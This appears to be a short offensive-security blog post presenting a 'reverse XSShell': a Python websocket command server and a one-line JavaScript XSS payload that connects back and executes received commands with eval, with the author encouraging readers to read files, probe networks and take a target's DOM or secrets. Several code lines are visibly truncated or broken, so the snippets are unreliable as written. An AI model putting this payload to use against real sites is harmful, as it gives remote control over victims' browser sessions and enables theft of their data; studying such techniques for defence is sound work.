Reverse XSShell

The initial idea

While auditing a website, I found out they were using websockets to transmit data. I didn’t kow much about it so I had to ReadTheFancyManual. Once I understood that it was… Well… A socket one could use with web technologies, I asked myself “What do I usually do with sockets?”

Tunnels! Transfer files! Or… Spawn reverse shells?!

Or… Spawn a reverse XSShell??

What do we need?

A websocket server

import asyncio
import websockets

async def hello(websocket, path):
    print("WebSocket received")

    while True:
        cmd = input("cmd > ")
        await websocket.send(cmd)
        print(f"sent: {cmd}")

        out = await websocket.recv()
        print(f"out : {out}\n")

start_server = websockets.serve(hello, "localhost", 8080)


Some javascript to connect back

  • Readable version

    var socket = new WebSocket("ws://localhost:8080/");
    socket.onopen = function() {
    socket.onmessage = function(event) {
    console.log("Cmd received",;
    // socket.close();
  • Actual payload I use

    s=new WebSocket("ws://localhost:8080/"),s.onmessage=function(ev){try{s.send(eval(}catch(e){s.send(e)}};

An html page to execute the payload

Who cares about html anyway?

In short

You can find the code here:

And what this gives us is a reverse shell in a javascript (browser / renderer) context. What you can do from here is up to you.. Try to read files, query the network, mess with your target’s DOM or secrets… Have fun ! :)




  • You still need an xss with little restrictions (use eval, long payload, …)
  • The reverse xsshell can be blocked on its way back by a firewall / proxy / SOP / CSP / …
  • Blocking actions (alert, prompt, redirect, …) will break the current shell (trig xss again!)


Once again, after spending some time experimenting a new idea, I start google it and… Well, it’s not really something new. It’s just about re-discovering what others found before. That being said, I love one-liners and keeping things as simple as possible, so it’s not the same-same.. :)


Infosec made easy A Helping Hand